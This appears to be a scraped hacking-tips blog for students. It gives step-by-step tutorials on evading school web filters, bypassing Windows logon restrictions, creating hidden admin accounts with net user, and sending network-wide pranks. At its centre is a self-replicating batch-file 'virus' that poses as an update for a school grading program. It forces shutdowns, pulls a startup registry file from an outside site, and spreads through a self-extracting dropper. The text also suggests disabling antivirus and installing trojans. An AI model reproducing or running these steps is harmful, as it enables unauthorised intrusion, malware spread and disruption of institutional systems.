It’s been too long in coming, but I’ve finally made the leap to Twitter. You can follow me here:
http://www.twitter.com/hackingtruths
I promise to keep you updated with the on goings in the Hacking Truths Blog and keep the topics and conversation similar. Although I’m hoping it will be a bit more lively and informal.
Finally I have decided to surprise you with a special gift. The first 500 followers will be awarded access to cool Hungry Hacker’s Resource.
See you there…
Lot´s of people complain that Web Proxys are not working at their Works / Schools computer because they have been banned by administrators. A way around this would be to setup your very own proxy server that is being hosted a) by a free web hosting service that supports either php or cgi or b) your own website that is being hosted by a web hosting company.
Both methods should work and I will walk you right through the installation process for both scripts and give you tips how to find out what is actually being blocked. Before we start you need to download a copy of phpproxy or cgiproxy depending on what you want and can use. You also could perform a search for free web hosting on google for instance and try to find a web host that supports one of the two languages, a good site that I found while searching for those terms might be freewebspace.net
1. phpproxy
Download phpproxy and unpack it to a local directory on your hard drive. All you need to do know is to upload the script to your webspace and open up the new url to check if its working allright. You might want to rename the file to something different, something that does not contain the word proxy in it to avoid filters that ban everything that has the word “proxy” in it.
You could open up the script and enter your clients ip in there to make sure that only your client will be able to connect or you could add a .htaccess file to the directory forcing everyone who wants to start the script to enter a username and password. Again, use google if you like to find out more information about .htaccess
The php script has some requirements, make sure you read the readme file which is included and check to see if your hoster has those requirements enabled.
[eminimall]
2. cgiproxy
Your hoster has to have cgi enabled in order to run this script. Many free hosters do not offer cgi or only some preinstalled scripts. Make sure it is enabled before you start the installation process.
First, download the source and unpack it to a local directory.
Now, open the .cgi file and take a look at the configuration. You can edit lots of settings from within, for example you could configure the script that way that it only allows text to go through the proxy but no images. Everything is explained in detail and all options are explained with comments, browse through the file, edit the options to your liking and save the new file.
After that upload the script to your cgi directory if that is required by your hoster and open the url from your browser. You are now ready to browse the web anonymously, to check if that is really the case load a website like whatismyip.com as the first site and check if the ip matches with the server the script is installed and not your computers ip. If that is the case you´ve done everything right and can surf anonymously. (there are still ways to find out your ip, just in case you are wondering)
3. What is being blocked ?
a) If you can access the proxy from the client they only block domains / ips.
b) If you can´t access the proxy they might be banning filenames that contain proxy as well, try changing the filename.
Hello Friends many of you have come with this problem of hacking the Administrator in Windows XP. So her is the Solution to your problem. This works on Win 2000 & Win XP.
This can be used to gain access to the website you want to for free, and how you can gain access to ‘control panel’, and the various other tools of Windows that may have been blocked from your grasp like ‘regedit’ by the administrator. IT can be used in schools & colleges..
When u are at the log on screen, type in your username and password. Now When you hit enter, and it comes up with the next screen, the rectangle one, immediatly pull out the network cable i.e. the cable wire.
Now you can log on without any restrictions because when the cable is pulled off then it does not download any settings from the server. Now you have access to control panel, & all the other features which had been blocked BUT there will be no network access. But that’s cool because now we can access ‘Internet options’,
click in the ‘connections’ tab click the LAN settings, click the proxy settings, and in the little white box at the bottom we can specify websites that bypass the proxy server (eg www.yahoo.com) Now once you have changed the settings to what you wish, apply them and restart the computer. Now get someone else to log onto it because if you log in it will load the cached settings from your previous log in, then after the other person logs in, everyone that logs in after them included themselves will have the internet settings you specified.
Its only an ‘Unplugging technique’ to gain access to a comp. locked by the administrator.
Now you can gain access to msconfig, regedit, command etc disable the virus scanner, or to install a trojan or a virus according to u’re will..
XP HOME ADVANCED FILE PERMISSIONS.!!
Access *Advance file Permissions* on NTFS file systems for XP Home simply by booting into *Safe Mode*, rt-clicking any file or folder, and navigating to the *Security tab*. This gives the user the ability to allow or deny read, write, execute, read & write, display contents, full-control, iheritance, and take ownership permissions, with many more options available to apply to different users and groups stored on the computer. Well, you don’t have to do this in *Safe Mode* (XP Home). Although it is a little less intuitive, you can simply go to your command prompt – Start>All Programs>Accessories>Command Prompt. Now type “cacls” in the window (without the quotes). This gives you the ability to add, remove or modify file permissions on files and folders through the command prompt. Type “cacls /?” for help on different options and variables. You do not need to be in safe mode to use this so it makes it a little quicker than using the safe mode security tab GUI. Remember – this only applies to NTFS. Here also is a very useful link to find a lot of extras and tweaks straight from the horse’s mouth – the Microsoft Resource Center. You will find a lot of very useful web-based extra’s here, most of them left unknowing to the general public – such as, “Online Crash Analysis” – a site that looks like Windows Update but you can upload your crash “dump logs” (when you get those system or application crash error reports). Microsoft will then analyze the log file and tell you some more info about WHY the system crashed (ie. faulty hardware/software/conflicts, etc).
Now lets c how to open restricted site on college servers
Hungry Hacker recommends : http://unblockall.net/
To use our service, simply type the address of the web site which you want to open in the field above and hit GO. This will automatically lead you to the destination page. With our service you are guaranteed to be able to login and operatate normally.
PLEASE DROP IN YOUR COMMENTS BELOW
How to become Admin on your school Network. This way works for most schools.
Howdy Everyone
This tutorial is for those newbies out there, wanting to “hack” their school.
Im gonna start by saying, if your going to hack the school, theres a high probability your get caught, and dont do anything dumb like deleting the network. Its lame, and you will get flamed for doing it. This hack will only allow you to hack the computer at a terminal connected to the network. If you want to remote hack your school, ask google.
Firstly get a feel for the layout of the network.. you can do this quickly by:
Start > Programs(Right Click) > Explore
this will give you a map of the network, and you’ll probably be able to edit and run files this way, but with DOS theres more options…
The basics for school hacking is accessing the command prompt, and 90% of school will have blocked this.
So to get around this you can do two things:
1) input this into the IE address “C:windowssystem32cmd.exe”
however this is very likely to be disabled.
2) Creating a Bat file to open Command Prompt.
You can do this by, opening IE > view > source.
once you have notepad open, where gonna make a .BAT file.
we want the BAT file to open up command prompt, so we type:
“CMD” without the “” press ENTER then save it as file.BAT.
Now you should be able to open Command Prompt by clicking on the file. If it fails to open, it is most likely that the CMD.exe is disabled and you dont have the privilages to run it.
So try using the file COMMAND instead. This does not have the same power as CMD, but is better than nothing.
Once we have it open now comes the good bit….
Before doing this, make sure you know a good lot of DOS commands.
Heres a great list www.computerhope.com/msdos
These are a few that you might like to try:
Net send * “Hungry Hacker is cool”
Shutdown -s -f -m &*92;NAME – rarely works
These will only work if you have the privilages to use them.
After you have access into Command Prompt, to get access to some programs that you are not allowed to use, DIR for Shortcuts (lnk). Then save them onto floppy disk. A shortcut is good, because it is smaller and quicker to save than a whole exe file.
There is also a good chance that the network will have RAT’s installed. A RAT is a (Remote Administration Tool). Used by Admins to manage networks… a bit like a friendly trojan.
This shouldnt be hard to find, and once you have found the EXE or LNK save it to a floppy, – Now you have control over every computer!!
You could use the RAT to use the admins machine, here possibilites are endless!
This article is for only educational purpose, i am not responsible for any misuse of this article.
By using the following command you can shutdown your school or college by using only Note pad.
This is the main command that will be launched upon startup.
Type this in Notepad.
@echo offshutdown.exe -s -t 10 -c
“You have been hacked!”
Save this as shutdown.bat, making sure you choose all files as the filetype.
Step 2
Make it run on StartupThe file you need can be downloaded here:This is just a simple registry file that anyone can create, but I don’t feel like explaining the registry to everyone. It will disguise itself by claiming to be an update for STI.
http://www.mutantsrus.com/Update.reg
Step 3
Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.
Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti
Here is the code:
@echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove C:\shutdown.batmove C:\Update.regexit
Save this as global.bat
Step 4
They grow up so fast — real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user’s hard drive and remain there.
@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:\$start real.exeexit
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.
Step 5
The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it.
@echo off
shutdown -acd C:\WINDOWSdel shutdown.bat
Save as cure.bat
@echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWS
Now download this file: http://www.mutantsrus.com/cure.exe
Step 6
The SetupNo it’s not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to “tools”, then select “convert archive to SFX”. Click “Advanced SFX Options” In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.)
Now that you have a command prompt, you can add a new user (ie yourself) like so
C:>net user username /ADD
where username is the name of your new account. And remember, try and make it look inconspicuous, then they’ll just think its a student who really is at school, when really, the person doesn’t EXIST! IF you wanna have a password, use this instead:
C:>net user username password /ADD
where password is the password you want to have. So for instance the above would create an account called ‘username’, with the password being ‘password’. The below would have a username of ‘JohnSmith’ and a password of ‘fruity’
C:>net user JohnSmith fruity /ADD
Right then, now that we can create accounts, let’s delete them:)
C:>net user JohnSmith /DELETE
This will delete poor liddle JohnSmith’s account. Awww. Do it to you enemies:P no only joking becuase they could have important work… well okay only if you REALLY hate them:)
Let’s give you admin priveleges:)
C:>net localgroup administrator JohnSmith /ADD
This will make JohnSmith an admin. Remember that some schools may not call their admins ‘adminstrator’ and so you need to find out the name of the local group they belong to.
You can list all the localgroups by typing
C:>net localgroup
Running .exe files you can’t usually run
In the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk.
Well, I hope this article helped a bit. Please vote for me if you liked it:) Also, please don’t go round screwing up your school servers, they are providing them free to you to help your learning.
I will add more as I learn more and remember stuff (I think I’ve left some stuff out – this article could get very long…)
Okay, here’s how to send crazy messages to everyone in your school on a computer. In your command prompt, type
Net Send * “The server is h4x0r3d”
*Note: may not be necessary, depending on how many your school has access too. If it’s just one, you can leave it out*
Where
Net Send Varndean * “The server is h4x0r3d”
The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people’s accounts, for example
NetSend Varndean dan,jimmy,admin “The server is h4x0r3d”
use commas to divide the names and NO SPACES between them.
Well, now you’ve got a command prompt, it’s time to visit whatever site you want. Now, there are plenty of ways to bypass poorly constructed filtering, but I’m going to take it for granted that your school has stopped these. This one, as far as I know, will never be stopped.
in your command prompt, type
ping hackthissite.org
or anything else you wanna visit. Now you should have a load of info, including delay times and, most importantly, an IP address for the website. Simply type this IP address into the address bar, preceded by http://, and you’ll be able to access the page!
For example: http://197.57.189.10 etc.
Now, I’ve noticed a lot of people have been saying that there are other ways to bypass web filtering, and there are. I am only mentioning the best method I know. Others you might want to try are:
1) Using a translator, like Altavista’s Babel fish, to translate the page from japanese of something to english. This will bypass the filtering and won’t translate the page, since it’s already in English.
2) When you search up the site on Google, there will be a link saying ‘Cache’. Click that and you should be on.
3) Use a proxy. I recommend Proxify.com. If your school has blocked it, search it up on Google and do the above. Then you can search to your heart’s content:)